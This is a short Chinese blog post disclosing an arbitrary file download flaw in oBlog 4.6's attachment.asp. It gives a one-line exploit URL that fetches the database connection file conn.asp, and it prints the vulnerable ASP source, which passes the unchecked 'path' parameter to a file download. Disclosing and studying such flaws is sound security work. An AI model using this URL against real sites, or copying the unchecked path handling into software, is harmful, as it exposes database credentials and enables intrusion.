鬼仔's Blog

转载著名出自：http://www.52cmd.cn
今天是愚人节嘛，大家不是愚人，不用我做解释。一眼就可以看出来。漏洞存在版本4.6sql+access，一路跟踪下去吧

漏洞文件：attachment.asp
利用很简单：http://test.cn/attachment.asp?path=./conn.asp 即可下载CONN

<!-- #include file="inc/inc_syssite.asp" -->
<%
Dim Path,rs,FileID,ShowDownErr,uid,file_ext
Dim SQL
Path = Trim(Request("path"))
FileID = Trim(Request("FileID"))
If FileID ="" And Path = "" Then
Response.Write "参数不足"
Response.End
End If
If CheckDownLoad Then
If Path = "" Then
set rs = Server.CreateObject("ADODB.RecordSet")
link_database
SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile Where FileID = "&CLng(FileID))
rs.open sql,conn,1,3
If Not rs.Eof Then
uid = rs(1)
file_ext = rs(2)
rs("ViewNum") = rs("ViewNum") + 1
rs.Update
downloadFile Server.MapPath(rs(0)),0
Else
Response.Status=404
Response.Write "该附件不存在!"
End If
rs.Close
Set rs = Nothing
Else
If true_domain = 1 Then
downloadFile Server.MapPath(Replace(Path,blogurl,"")),1
else
downloadFile Server.MapPath(Path),1
End If
End If
Else
'如果附件为图片的话，当权限检验无法通过则调用一默认图片，防止<img>标记无法调用，影响显示效果
If Path = "" Then
Response.Status=403
Response.Write ShowDownErr
Response.End
Else
downloadFile Server.MapPath(blogdir&"images/oblog_powered.gif"),1
End if
End if